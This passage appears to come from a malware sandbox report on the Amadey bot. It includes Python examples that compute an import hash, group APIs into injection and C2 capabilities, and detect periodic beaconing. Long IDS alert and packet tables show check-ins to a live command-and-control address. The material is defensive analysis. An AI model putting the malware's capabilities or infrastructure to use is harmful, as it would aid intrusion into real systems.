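    ("ADVAPI32.dll", ["RegCloseKey", "RegQueryValueExA", "GetUserNameA", "RegSetValueExA",
                      "RegOpenKeyExA", "ConvertSidToStringSidW", "GetUserNameW", "LookupAccountNameW"]),
    ("SHELL32.dll", ["SHGetFolderPathA", "ShellExecuteA", "SHFileOperationA"]),
    ("WININET.dll", ["HttpOpenRequestA", "InternetReadFile", "InternetConnectA", "HttpSendRequestA",
                     "InternetCloseHandle", "InternetOpenA", "InternetOpenW", "InternetOpenUrlA"]),
]
REPORT_IMPHASH = "f8cc61ade86cb7277d0ab974de6323cb"  # "Import Hash" printed in the report


def imphash(imports):
    """md5 over 'lib.func' entries, lowercased, joined by ','. The library name
    loses a .dll/.ocx/.sys suffix; an ordinal import becomes 'ord<N>' (pefile
    also maps known ordinals of a few system DLLs to names; omitted here)."""
    parts = []
    for dll, funcs in imports:
        lib = dll.lower()
        if lib.endswith((".dll", ".ocx", ".sys")):
            lib = lib[:-4]
        for func in funcs:
            name = f"ord{func}" if isinstance(func, int) else func.lower()
            parts.append(f"{lib}.{name}")
    return hashlib.md5(",".join(parts).encode("ascii")).hexdigest()


# Example's own clusters: a single member proves little (every program calls
# CreateProcessA or Sleep); the full set together is the signal.
CLUSTERS = {
    "process_injection": {"CreateProcessA", "VirtualAllocEx", "WriteProcessMemory", "ReadProcessMemory",
                          "GetThreadContext", "SetThreadContext", "ResumeThread"},
    "http_c2": {"InternetOpenA", "InternetConnectA", "HttpOpenRequestA", "HttpSendRequestA", "InternetReadFile"},
    "registry_write": {"RegOpenKeyExA", "RegSetValueExA"},
    "host_fingerprint": {"GetComputerNameExW", "GetUserNameA", "GetVersionExW", "GetSystemInfo",
                         "LookupAccountNameW"},
}


def capabilities(imports, min_coverage=0.75):
    """{cluster: sorted present APIs} for clusters with >= min_coverage of members imported."""
    present = {f for _, funcs in imports for f in funcs if not isinstance(f, int)}
    hits = {}
    for name, apis in CLUSTERS.items():
        found = apis & present
        if len(found) / len(apis) >= min_coverage:
            hits[name] = sorted(found)
    return hits


def triage(imports, reported_imphash=None):
    computed = imphash(imports)
    return {"imphash": computed,
            "matches_report": None if reported_imphash is None else computed == reported_imphash.lower(),
            "capabilities": capabilities(imports)}


if __name__ == "__main__":
    result = triage(REPORT_IMPORTS, REPORT_IMPHASH)
    print("imphash:", result["imphash"], "matches report:", result["matches_report"])
    for cluster, apis in result["capabilities"].items():
        print(f"{cluster}: {', '.join(apis)}")
```

The process_injection cluster (CreateProcessA with GetThreadContext/SetThreadContext, VirtualAllocEx, WriteProcessMemory and ResumeThread) is the API set behind the report's "Creates a process in suspended mode (likely to inject code)" signature; the http_c2 cluster is the WinINet path used for the check-ins to 193.3.19.154. Because imphash is order-sensitive, a mismatch against the reported value means the printed order differs from the directory order, not that the list is wrong.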
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-23T20:52:56.688685+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 50036 | 193.3.19.154 | 80 | TCP
2024-11-23T20:52:56.688685+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 50036 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:04.143083+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 49705 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:04.143083+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 49705 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:04.143141+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49704 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:08.382363+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 49706 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:08.382363+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 49706 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:12.626276+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49708 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:12.626323+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 49707 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:12.626323+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 49707 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:16.860879+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 49709 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:16.860879+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 49709 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:21.095122+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49714 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:21.095201+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 49712 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:21.095201+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 49712 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:25.313904+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 49722 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:25.313904+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 49722 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:29.579645+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49735 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:29.579693+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 49733 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:29.579693+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 49733 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:33.829480+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 49741 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:33.829480+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 49741 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:38.073084+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 49752 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:38.073084+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 49752 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:38.073133+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49754 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:42.313889+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 49764 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:42.313889+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 49764 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:46.532660+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 49775 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:46.532660+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 49775 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:46.532797+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49776 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:50.782734+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 49787 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:50.782734+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 49787 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:55.042480+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 49794 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:55.042480+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 49794 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:59.298221+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 49804 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:59.298221+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 49804 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:03.548223+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 49815 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:03.548223+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 49815 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:07.798356+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 49826 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:07.798356+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 49826 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:12.048318+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 49837 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:12.048318+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 49837 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:16.282841+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 49848 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:16.282841+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 49848 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:20.533150+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 49859 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:20.533150+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 49859 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:24.851912+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 49867 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:24.851912+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 49867 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:29.157698+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 49878 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:29.157698+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 49878 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:33.560630+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 49887 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:33.560630+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 49887 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:37.814020+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 49898 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:37.814020+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 49898 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:42.064285+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 49909 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:42.064285+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 49909 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:46.314044+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 49920 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:46.314044+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 49920 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:50.563900+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 49930 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:50.563900+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 49930 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:54.816557+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 49940 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:54.816557+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 49940 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:57.550787+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 49950 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:57.550787+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 49950 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:01.782905+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 49958 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:01.782905+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 49958 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:06.032766+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 49967 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:06.032766+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 49967 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:10.291064+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 49976 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:10.291064+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 49976 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:14.517087+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 49987 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:14.517087+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 49987 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:18.770958+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 49998 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:18.770958+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 49998 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:23.026943+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 50009 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:23.026943+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 50009 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:27.284604+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 50016 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:27.284604+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 50016 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:31.534796+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 50017 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:31.534796+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 50017 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:35.782914+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 50018 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:35.782914+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 50018 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:40.001425+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 50019 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:40.001425+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 50019 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:44.236221+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 50020 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:44.236221+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 50020 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:48.526834+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 50021 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:48.526834+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 50021 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:52.784639+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 50022 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:52.784639+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 50022 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:57.136097+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 50023 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:57.136097+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 50023 | 193.3.19.154 | 80 | TCP
2024-11-23T20:56:01.438981+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 50024 | 193.3.19.154 | 80 | TCP
2024-11-23T20:56:01.438981+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 50024 | 193.3.19.154 | 80 | TCP
2024-11-23T20:56:05.680904+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 50025 | 193.3.19.154 | 80 | TCP
2024-11-23T20:56:05.680904+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 50025 | 193.3.19.154 | 80 | TCP
2024-11-23T20:56:09.923228+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 50026 | 193.3.19.154 | 80 | TCP
2024-11-23T20:56:09.923228+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 50026 | 193.3.19.154 | 80 | TCP
2024-11-23T20:56:14.164217+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 50027 | 193.3.19.154 | 80 | TCP
2024-11-23T20:56:14.164217+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 50027 | 193.3.19.154 | 80 | TCP
2024-11-23T20:56:18.455177+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 50028 | 193.3.19.154 | 80 | TCP
2024-11-23T20:56:18.455177+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 50028 | 193.3.19.154 | 80 | TCP
2024-11-23T20:56:22.706673+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 50029 | 193.3.19.154 | 80 | TCP
2024-11-23T20:56:22.706673+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 50029 | 193.3.19.154 | 80 | TCP
2024-11-23T20:56:26.956810+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 50030 | 193.3.19.154 | 80 | TCP
2024-11-23T20:56:26.956810+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 50030 | 193.3.19.154 | 80 | TCP
2024-11-23T20:56:31.204734+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 50031 | 193.3.19.154 | 80 | TCP
2024-11-23T20:56:31.204734+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 50031 | 193.3.19.154 | 80 | TCP
2024-11-23T20:56:35.454542+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 50032 | 193.3.19.154 | 80 | TCP
2024-11-23T20:56:35.454542+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 50032 | 193.3.19.154 | 80 | TCP
2024-11-23T20:56:39.694587+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 50033 | 193.3.19.154 | 80 | TCP
2024-11-23T20:56:39.694587+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 50033 | 193.3.19.154 | 80 | TCP
2024-11-23T20:56:43.907721+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 50034 | 193.3.19.154 | 80 | TCP
2024-11-23T20:56:43.907721+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 50034 | 193.3.19.154 | 80 | TCP
2024-11-23T20:56:48.157989+0100 | 2027700 | ET MALWARE Amadey CnC Check-In | 1 | 192.168.2.5 | 50035 | 193.3.19.154 | 80 | TCP
2024-11-23T20:56:48.157989+0100 | 2045751 | ET MALWARE Win32/Amadey Bot Activity (POST) M2 | 1 | 192.168.2.5 | 50035 | 193.3.19.154 | 80 | TCP
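Added example (not part of the Joe Sandbox report): the check-in alerts above replayed as Suricata EVE JSON and tested for beaconing. The EVE lines are constructed here from the first rows of the table (the report prints a table, not EVE output); the IPs, ports, SIDs and timestamps are the report's, while the EVE rendering, the 8-event minimum and the 10% jitter threshold are the example's own assumptions.

```python
"""Beacon-interval analysis over Suricata EVE alerts: per-signature counts and a
median/MAD periodicity test for one signature towards one destination."""
import json
import statistics
from collections import Counter
from datetime import datetime

CHECKIN = "ET MALWARE Amadey CnC Check-In"
POST = "ET MALWARE Win32/Amadey Bot Activity (POST) M2"
DLHDR = "ETPRO MALWARE Common Downloader Header Pattern H"

# (timestamp, signature_id, signature, severity, src_port) from the first rows of
# the report's alert table; later rows continue the same cadence.
REPORT_ROWS = [
    ("2024-11-23T20:52:56.688685+0100", 2027700, CHECKIN, 1, 50036),
    ("2024-11-23T20:52:56.688685+0100", 2045751, POST, 1, 50036),
    ("2024-11-23T20:53:04.143083+0100", 2027700, CHECKIN, 1, 49705),
    ("2024-11-23T20:53:04.143141+0100", 2803305, DLHDR, 3, 49704),
    ("2024-11-23T20:53:08.382363+0100", 2027700, CHECKIN, 1, 49706),
    ("2024-11-23T20:53:12.626323+0100", 2027700, CHECKIN, 1, 49707),
    ("2024-11-23T20:53:16.860879+0100", 2027700, CHECKIN, 1, 49709),
    ("2024-11-23T20:53:21.095201+0100", 2027700, CHECKIN, 1, 49712),
    ("2024-11-23T20:53:25.313904+0100", 2027700, CHECKIN, 1, 49722),
    ("2024-11-23T20:53:29.579693+0100", 2027700, CHECKIN, 1, 49733),
    ("2024-11-23T20:53:33.829480+0100", 2027700, CHECKIN, 1, 49741),
    ("2024-11-23T20:53:38.073084+0100", 2027700, CHECKIN, 1, 49752),
    ("2024-11-23T20:53:42.313889+0100", 2027700, CHECKIN, 1, 49764),
    ("2024-11-23T20:53:46.532660+0100", 2027700, CHECKIN, 1, 49775),
]


def to_eve(rows, src_ip="192.168.2.5", dest_ip="193.3.19.154", dest_port=80):
    """Render rows as EVE 'alert' records, one JSON object per line (constructed)."""
    lines = []
    for ts, sid, sig, sev, sport in rows:
        lines.append(json.dumps({
            "timestamp": ts, "event_type": "alert",
            "src_ip": src_ip, "src_port": sport,
            "dest_ip": dest_ip, "dest_port": dest_port, "proto": "TCP",
            "alert": {"signature_id": sid, "signature": sig, "severity": sev},
        }))
    return lines


SAMPLE_EVE = to_eve(REPORT_ROWS)


def load_alerts(lines):
    """Keep alert events only; Suricata's '+0100' offsets parse with strptime %z."""
    alerts = []
    for line in lines:
        ev = json.loads(line)
        if ev.get("event_type") != "alert":
            continue
        alerts.append({
            "t": datetime.strptime(ev["timestamp"], "%Y-%m-%dT%H:%M:%S.%f%z"),
            "sid": ev["alert"]["signature_id"],
            "dst": (ev["dest_ip"], ev["dest_port"]),
            "sport": ev["src_port"],
        })
    return alerts


def alerts_per_signature(alerts):
    return Counter(a["sid"] for a in alerts)


def beacon_stats(alerts, sid, dst=None, min_events=8, max_jitter=0.1):
    """Median inter-arrival time and MAD/median jitter for one signature towards
    one destination. Median and MAD are used instead of mean and stdev so a
    single long gap (the 7.45 s first interval here) does not hide the cadence."""
    sel = [a for a in alerts if a["sid"] == sid and (dst is None or a["dst"] == dst)]
    times = sorted(a["t"] for a in sel)
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    stats = {"n": len(times), "intervals": len(gaps),
             "distinct_src_ports": len({a["sport"] for a in sel}),
             "median_s": None, "mad_s": None, "jitter": None, "is_beacon": False}
    if len(times) < min_events:
        return stats
    median = statistics.median(gaps)
    mad = statistics.median([abs(g - median) for g in gaps])
    stats.update(median_s=median, mad_s=mad,
                 jitter=mad / median if median else float("inf"))
    stats["is_beacon"] = stats["jitter"] < max_jitter
    return stats


if __name__ == "__main__":
    alerts = load_alerts(SAMPLE_EVE)
    print(alerts_per_signature(alerts))
    print(beacon_stats(alerts, 2027700, dst=("193.3.19.154", 80)))
```

On the report's rows the check-in signature fires every 4.24 s with jitter well under 1%, and every check-in uses a fresh ephemeral source port, i.e. one short TCP connection per beacon rather than a kept-alive session; both are the properties a periodicity detector keys on when no signature matches the payload.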
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 23, 2024 20:53:00.002206087 CET | 49704 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:00.010263920 CET | 49705 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:00.124864101 CET | 80 | 49704 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:53:00.126138926 CET | 49704 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:00.133295059 CET | 80 | 49705 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:53:00.133389950 CET | 49705 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:00.134437084 CET | 49705 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:00.156812906 CET | 49704 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:00.260898113 CET | 80 | 49705 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:53:00.283392906 CET | 80 | 49704 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:53:04.143083096 CET | 49705 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:04.143141031 CET | 49704 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:04.252187967 CET | 49706 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:04.371838093 CET | 80 | 49706 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:53:04.372108936 CET | 49706 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:04.372400045 CET | 49706 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:04.491997957 CET | 80 | 49706 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:53:08.382363081 CET | 49706 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:08.489516973 CET | 49707 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:08.612205982 CET | 80 | 49707 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:53:08.612313986 CET | 49707 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:08.615879059 CET | 49707 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:08.739934921 CET | 80 | 49707 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:53:09.158493996 CET | 49708 | 80 | 192.168.2.5 | 193.3.19.154
Nov 23, 2024 20:53:09.280980110 CET | 80 | 49708 | 193.3.19.154 | 192.168.2.5
Nov 23, 2024 20:53:09.281224012 CET | 49708 | 80 | 192.168.2.5 | 193.3.19.154
